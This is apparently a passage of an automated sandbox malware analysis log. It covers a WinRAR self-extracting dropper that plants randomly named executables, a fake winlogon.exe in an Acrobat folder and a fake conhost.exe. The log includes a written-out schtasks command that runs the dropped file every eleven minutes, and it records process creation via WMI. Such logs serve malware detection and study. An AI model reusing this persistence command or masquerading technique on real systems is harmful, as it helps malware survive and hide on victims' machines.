            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: version.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: wldp.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: profapi.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: amsi.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: userenv.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: propsys.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: edputil.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: netutils.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: slc.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: sppc.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: mscoree.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: apphelp.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: kernel.appcore.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: version.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: uxtheme.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: windows.storage.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: wldp.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: profapi.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptsp.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: rsaenh.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: cryptbase.dll
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7bJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76dJump to behavior
            Source: QIKiV83Pkl.exeStatic file information: File size 2777219 > 1048576
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: QIKiV83Pkl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: QIKiV83Pkl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QIKiV83Pkl.exe
            Source: QIKiV83Pkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: QIKiV83Pkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: QIKiV83Pkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: QIKiV83Pkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: QIKiV83Pkl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeFile created: C:\brokermonitordhcp\__tmp_rar_sfx_access_check_5730812Jump to behavior
            Source: QIKiV83Pkl.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088E28C push eax; ret 0_2_0088E2AA
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088ED46 push ecx; ret 0_2_0088ED59
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeCode function: 21_2_00007FFAAC489178 pushad ; ret 21_2_00007FFAAC489179
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeCode function: 21_2_00007FFAAC48055E push ds; retf 21_2_00007FFAAC48055F
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeCode function: 21_2_00007FFAAC47EC5F pushad ; retf 21_2_00007FFAAC47EC60

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops executable to a common third party application directory
            Source: C:\brokermonitordhcp\portruntime.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\conhost.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeFile created: C:\brokermonitordhcp\portruntime.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\conhost.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\conhost.exeJump to dropped file
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exeJump to dropped file
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
